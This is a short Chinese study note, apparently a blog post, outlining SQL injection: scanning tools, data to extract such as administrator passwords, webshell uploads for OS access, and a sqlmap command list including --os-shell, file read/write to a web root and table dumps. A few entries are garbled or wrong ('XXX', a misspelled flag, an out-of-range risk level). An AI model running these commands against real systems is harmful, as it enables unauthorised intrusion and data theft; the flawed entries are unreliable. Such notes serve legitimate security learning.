1、注入点探测
自动探测(工具):web漏扫工具,AWVS、APPSCAN、openVAS、nessus、OWASP ZAP、Burpsuite
手工方式:手工构造payload
信息获取
环境信息:数据库的类型,版本,操作系统类型版本,用户信息
数据库的信息:库名,表名,字段名,数据值 (管理员账户密码)
获取权限
获取操作系统权限,通过执行shell,上传大马或者小马
2、5种注入类型:盲注、联合注入、二次注入、堆叠、XXX
整型
字符型
搜索型
3.sqlmap工具
sqlmap python2.x环境
sqlmap -u url地址/参数=值 --dbs
sqlmap -u url地址/参数=值 --os-shell
sqlmap -u url地址/参数=值 --level 5 --risk=4
sqlmap -u url地址/参数=值 --file-read “c:\1.sh”
sqlmap -u url地址/参数=值 --file-wirte shell.php --file-dest “C:\WWW\XXXX”
sqlmap -u url地址/参数=值 --data=name&pass&submit
基础语法
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current–db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息
sql注入漏洞
最新推荐文章于 2023-03-02 18:19:22 发布